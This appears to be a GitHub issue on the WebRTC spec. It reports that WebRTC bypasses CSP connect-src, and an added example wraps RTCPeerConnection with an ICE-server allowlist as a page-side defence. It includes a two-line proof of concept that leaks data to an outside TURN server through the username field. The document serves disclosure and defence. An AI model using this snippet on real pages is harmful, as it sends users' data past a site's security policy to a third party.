WebRTC bypass CSP connect-src policies #35

@murillo128

As explained in w3c/webappsec-csp#92, WebRTC bypasses the CSP security policies for connect-src, and a malicious script could use WebRTC to leak data to a rogue server.

Note that it is not even necessary to use data channels at all, as you could leak data (at a low rate) to a specially crafted TURN server in the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));

IMHO this should be covered in the CSP spec, but we should add a warning to the security and privacy section of the WebRTC spec until this is solved.
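
A page-side mitigation for the gap described above, as an added example that is not part of the original issue or of any spec: it wraps `RTCPeerConnection` so that ICE server hosts are checked against an allowlist, the way `connect-src` would check a fetch target. The function names and the `stun.example.org` host used when calling it are assumptions made for illustration.

```javascript
// Added example: enforce a connect-src-style host allowlist on ICE servers.
// Matches the stun:/turn: URL shape scheme:host[:port][?query].
const ICE_URL = /^(stuns?|turns?):(\[[^\]]+\]|[^:?\[\]]+)(?::(\d+))?(?:\?.*)?$/i;

// Return the host of a STUN/TURN URL in lower case, or null if it does not parse.
function iceHost(url) {
  const m = ICE_URL.exec(String(url).trim());
  return m ? m[2].toLowerCase() : null;
}

// Return the URLs in an RTCConfiguration whose host is not in allowedHosts.
function disallowedIceUrls(config, allowedHosts) {
  const allowed = new Set([...allowedHosts].map((h) => h.toLowerCase()));
  const bad = [];
  for (const server of (config && config.iceServers) || []) {
    // `urls` may be a string or an array; `url` is the legacy key.
    const urls = [].concat(server.urls ?? server.url ?? []);
    for (const u of urls) {
      const host = iceHost(u);
      if (host === null || !allowed.has(host)) bad.push(String(u));
    }
  }
  return bad;
}

// Replace scope.RTCPeerConnection (and the webkit alias) with a checking subclass.
// Limits: it must be installed before any untrusted script runs, and a script
// that takes a fresh constructor from another realm (an iframe) is not covered.
function installIceAllowlist(scope, allowedHosts, report = () => {}) {
  for (const name of ["RTCPeerConnection", "webkitRTCPeerConnection"]) {
    const Native = scope[name];
    if (typeof Native !== "function") continue;
    scope[name] = class extends Native {
      constructor(config, ...rest) {
        const bad = disallowedIceUrls(config, allowedHosts);
        if (bad.length > 0) {
          report(bad); // URLs only; username and credential are not reported
          throw new Error("ICE server not in allowlist: " + bad.join(", "));
        }
        super(config, ...rest);
      }
    };
  }
}
```

In a page this would be called once, early, as `installIceAllowlist(window, [...])` with the hosts the application actually uses.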
